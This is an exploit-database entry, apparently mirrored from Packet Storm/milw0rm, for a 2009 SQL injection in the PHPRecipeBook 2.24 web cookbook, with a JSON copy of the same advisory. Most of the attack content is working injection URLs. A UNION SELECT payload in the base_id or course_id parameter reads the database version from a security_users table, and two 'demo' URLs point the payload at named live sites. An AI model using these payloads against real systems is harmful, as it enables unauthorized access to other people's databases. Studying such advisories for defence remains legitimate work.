Search...

PHPRecipeBook 2.24 SQL Injection

2009-03-09T00:00:00

ID PACKETSTORM:75535
Type packetstorm
Reporter d3b4g
Modified 2009-03-09T00:00:00

Description

                                        
                                            `[+] PHPRecipeBook 2.24 (_id)Remort SQL Injection Vulnerability  
[-]   
[+] Discovered By d3b4g   
[+] script: http://phprecipebook.sourceforge.net/demo/phprecipebook/   
[+] Greetz : str0ke | Inerd | & friends  
[-] Follow me on twitter www.twitter.com/schaba  
  
  
About:  
------&gt;  
PHPRecipeBook is a Web-based cookbook with the   
ability to create shopping lists from recipes selected.  
The lists can be saved and later reloaded and edited.   
The shopping list also attempts to combine similar items  
so that duplication does not occur.   
  
  
  
/* start  
  
0x1   
  
Proof of concept   
-------------------------------------  
  
Exploit:http:localhost.com[path]index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--  
  
Demo:1 http://phprecipebook.sourceforge.net/demo/phprecipebook/index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--  
  
Demo:2 http://recipes.casetaintor.com/index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--  
  
  
/* end  
  
-------------------------------------  
From Tiny Little island of Maldivies   
-------------------------------------  
  
# milw0rm.com [2009-03-10]`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:75535", "type": "packetstorm", "bulletinFamily": "exploit", "title": "PHPRecipeBook 2.24 SQL Injection", "description": "", "published": "2009-03-09T00:00:00", "modified": "2009-03-09T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/75535/PHPRecipeBook-2.24-SQL-Injection.html", "reporter": "d3b4g", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:16:14", "viewCount": 0, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2016-11-03T10:16:14", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:16:14", "rev": 2}, "vulnersScore": 0.2}, "sourceHref": "https://packetstormsecurity.com/files/download/75535/phprecipebook-sql.txt", "sourceData": "`[+] PHPRecipeBook 2.24 (_id)Remort SQL Injection Vulnerability \n[-] \n[+] Discovered By d3b4g \n[+] script: http://phprecipebook.sourceforge.net/demo/phprecipebook/ \n[+] Greetz : str0ke | Inerd | & friends \n[-] Follow me on twitter www.twitter.com/schaba \n \n \nAbout: \n------> \nPHPRecipeBook is a Web-based cookbook with the \nability to create shopping lists from recipes selected. \nThe lists can be saved and later reloaded and edited. \nThe shopping list also attempts to combine similar items \nso that duplication does not occur. \n \n \n \n/* start \n \n0x1 \n \nProof of concept \n------------------------------------- \n \nExploit:http:localhost.com[path]index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users-- \n \nDemo:1 http://phprecipebook.sourceforge.net/demo/phprecipebook/index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users-- \n \nDemo:2 http://recipes.casetaintor.com/index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users-- \n \n \n/* end \n \n------------------------------------- \nFrom Tiny Little island of Maldivies \n------------------------------------- \n \n# milw0rm.com [2009-03-10]`\n"}